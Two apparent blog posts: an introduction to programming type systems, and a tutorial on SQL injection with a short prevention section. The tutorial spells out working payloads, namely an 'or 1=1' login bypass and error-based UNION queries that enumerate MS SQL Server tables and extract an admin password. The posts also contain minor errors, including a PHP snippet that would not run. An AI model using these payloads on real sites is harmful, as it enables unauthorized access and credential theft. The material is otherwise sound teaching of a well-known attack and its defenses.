Programming Type Systems

If you are a programmer who has worked with multiple programming languages, you must have noticed that while some languages, such as Java and C++, use almost similar methods to define their data types, while others, such as Python and Matlab, use completely different methods. This is because those two groups of languages use different type systems.

A type system is defined as tractable syntactic framework for classifying phrases according to the kinds of values they compute. It associates types with each computed value, and, by examining the flow of these values, attempts to prove that no type errors can occur. A type system generally seeks to guarantee that operations expecting a certain kind of value are not used with values for which that operation makes no sense.

Ok, in simpler words, a type system is a way for programming languages to classify values and expressions into types, how it can manipulate those types, and how they interact. Or, in even simpler terms, how data types are assigned to variables, and how they are handled. There are four type systems that programming languages can adopt. ANY programming language you know or have worked with, except two languages, belongs to at least two of the following categories:

Statistically-typed languages: languages in which data types are fixed at compile time, in other words, type checking (verification) is done when the code is compiled. Languages that use static typing include C++, Java, C#, and F#. These languages enforce this by requiring the programmer to explicitly declare all variables with their data types before use. An example of this is the floating point variables declaration in Java:

float f = 1.0f;

Static typing allows data type errors to be caught earlier in the development cycle. Besides verifying data types, static type checkers verify that the checked conditions hold for all possible executions of the program, which eliminates the need to repeat type checks every time the program is executed. Program execution may also be made more efficient by omitting runtime type checks. However, static typing can sometimes reduce code flexibility.

Dynamically-typed languages: languages in which the majority of its type checking is performed at run-time instead of checking at compile-time. Languages that use dynamic typing include JavaScript, PHP, Python, and Tcl. In dynamic typing, the values have types, not the variables; that is, a variable can refer to a value of any type. An example of this in Python:

x = 1
print x
x = "Hello, world!"
print x

This code would produce no errors and print “1” and “Hello, world!” By allowing programs to generate types and functionality based on run-time data, dynamic typing can be more flexible than static typing. However, dynamic typing may result in runtime type errors; at runtime, a value may have an unexpected type, and an operation nonsensical for that type is applied. Also, this operation could occur long after the place where the wrong type of data passed into a place it should not have, which makes the bug difficult to locate.

One thing to notice is that a dynamically-typed language is not necessarily a dynamic language. The term dynamic language means something different, but more on that later. (In a separate post, maybe? ;))

Strongly-typed languages: languages in which data types are always enforced. A data type cannot be treated like another unless it is explicitly converted. Strongly typed languages, such as C, Java, Pascal, and Python specify severe restrictions on how operations involving values having different data types can be intermixed, preventing the compiling or running of source code which uses data in what is considered to be an invalid way, e.g. the division of an inter over a string. To ensure they achieve their purpose, strongly-typed languages apply some or all of the following constraints:

  • The compiler must ensure that operations occur only on operand types that are valid for the operation.
  • An error must occurs as soon as a type-matching failure happens at runtime, or, as a special case of that with even stronger constraints, type-matching failures must never happen at runtime
  • Omitting implicit type conversions- conversions that are inserted by the compiler on the programmer’s behalf.
  • The type of a given data object does not vary over that object’s lifetime.
  • Type conversions are allowed only when an explicit notation, often called a cast, is used to indicate the desire of converting one type to another.
  • Disallowing any kind of type conversion. Values of one type cannot be converted to another type, explicitly or implicitly.

For example, an attempt to add an integer and a string in Python:

x = 1
y = "Hello, world!"
print x + y

will produce the error:

TypeError: unsupported operand type(s) for +: ‘int’ and ‘str’

Weakly-typed languages: languages in which types may be ignore. Weakly-typed languages support either implicit type conversion, ad-hoc polymorphism (overloading) or both. For example, adding an integer and a string in Matlab:

x = 1;
y = 'Hello, world!';
z = x + y

will not produce any error, actually it will produce the result:

z =    73   102   109   109   112    45    33   120   112   115   109   101    34

One last thing I want to talk about is type safety. Type safety can be defined as the use of a type system to prevent certain erroneous or undesirable program behaviour. This can be achieved statically, by catching potential errors at compile time, or dynamically, by associating type information with values at run time and consulting them as needed to detect imminent errors, or using combination of both. A programming language is called “type-safe” if it does not allow operations or conversions that lead to erroneous conditions, such as the previous Python example.

Remember when I said at the beginning of this post that all programming languages, adopt at least two of the four typing schemes, except two languages? Those two languages are the Assembly Language and Forth. Those two languages have been said to be untyped. There is no type checking. It is up to the programmer to ensure that data given to functions is of the appropriate type. Any type conversion required is explicit.

Share

Things That Not All Programmers Know #3: SQL Injection

Despite the fact that this a relatively old, and very famous security attack, many people I know do not know SQL injection or how it is performed. In this post, I am going to give a little introduction to SQL injection, some examples of how it is done and how to prevent it from becoming a threat to your Web site.

SQL injection- also known as SQL insertion- is a form of attack on a database-driven Web site, in which the attacker executes unauthorized SQL commands by exploiting a security vulnerability occurring in the database layer. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. This is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

More specifically, SQL injection is a trick to inject a SQL query or command as an input via Web pages that take parameters from Web user, such as a username and a password, and then make SQL query to the database to check the validity of these parameters, which will grant us something else.

It attacks on the web application, such as ASP, JSP, PHP, CGI, itself rather than on the web server or services running in the OS.

Testing the system’s vulnerability:

To successfully perform SQL injection, you have to first test if the system is vulnerable to such attack. You can do that by either looking for the “FORM” tag in the HTML source code of pages that allow you to submit data, such as login forms, where you may find something like this (a parameter that can be exploited):

<FORM action=“Search”/search.asp method=”POST”>
<input type=”hidden” name=“A” value=“C”>
</FORM>

Or by looking for ASP, JSP, PHP, or CGI Web pages, where the page URL takes parameters, like: http://duck/index.asp?id=10

Either way, you can test by attempting to log in by using the values or changing the URL parameter value to a’ or 1=1–. Example:

Username: a’ or 1=1–
Password: a’ or 1=1–
http://duck/index.asp?id= a’ or 1=1–

<FORM action=“Search”/search.asp method=”POST”>
<input type=”hidden” name=“A” value=“a’ or 1=1--”>
</FORM>

If the system is vulnerable, you will get login without any username or password.

Getting data from the database using error messages:

Error messages produced by Microsoft SQL Server can be exploited in order to get almost any desired data from the database. Take this page for example:

http://duck/index.asp?id=10

To get the name of the first table of the database, we can use the INFORMATION_SCHEMA.TABLES system table. This table contains information of all tables in the server and always exists. The TABLE_NAME field contains the name of each table in the database. So, what we are going to do here is UNION the parameter value ‘10’ with a query to get the first table name in the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1’ to a column of data type int.
/index.asp, line 5

The error tells you the value that cannot be converted to int, which in that case is the name of the first table. To get the next table name, you can use this query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

You can also use the LIKE keyword if you are looking for a specific table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

This will result in the following error:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin_login’ to a column of data type int.
/index.asp, line 5

‘%25login%25’ will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, “admin_login”.

Similarly, you can use the same method to obtain all column names from tables using the system table INFORMATION_SCHEMA.COLUMNS. For example, to get the first column name, use the query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Which will produce an error message from which you can get the name of the first column name. You can then use the NOT IN keywords as before to get the following column names.

After identifying the names of the database tables and columns, the same technique can be used again to get any information from the database. For example, assume you want to get the first username from the table “admin_login”, you can use the query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 username FROM admin_login—

The following error would result:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin’ to a column of data type int.
/index.asp, line 5

So you now know that there is a user with a username of “admin”. To get the password of that username from the database, use the query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where username='admin'--

The following error would result:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘p@ssword’ to a column of data type int.
/index.asp, line 5

Now you can log in to the system using the name “admin” and password “p@ssword”.

Preventing SQL injection:

To protect against SQL injection, two methods can be used, one is called Escaping, which filters out (escapes) character like single quote, double quote, slash, back slash, semi colon, extended characters like NULL, carriage return, new line, etc, in all strings from users’ input, URL parameters, and cookies’ values. For example, every occurrence of a single quote (‘) in a parameter must be replaced by two single quotes (”) to form a valid SQL string literal. This method is error-prone, however, as this is a type of blacklist, which has proved to be much less robust than whitelists. An example of escaping is using the function mysql_real_escape_string before sending the query in  PHP:

$query = sprintf("SELECT * FROM Users where UserName='%s' and Password='%s'"   mysql_real_escape_string($Username),
mysql_real_escape_string($Password));
mysql_query($query);

Another method is to use parameterized statements, which enables users’ input to be initially filtered instead of directly embedding it in the SQL statements. An example of parameterized statements is PerparedStatement in the Java JDBC API:

PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE USERNAME=? AND PASSWORD=?");
prep.setString(1, username);
prep.setString(2, password);
prep.executeQuery();

Another things that can be done to avoid SQL injection is to convert numeric values to integers before parsing them into the SQL statement. Or using ISNUMERIC to verify that they are integers.

And that’s it. Hope that was clear and simple enough. Your questions and comments are always welcomed.

Disclaimer: all of the information posted here is gathered from online published materials. None of this is my work and I am absolutely not responsible for any misuse of it. Modify/edit/use it at your own responsibility.

Share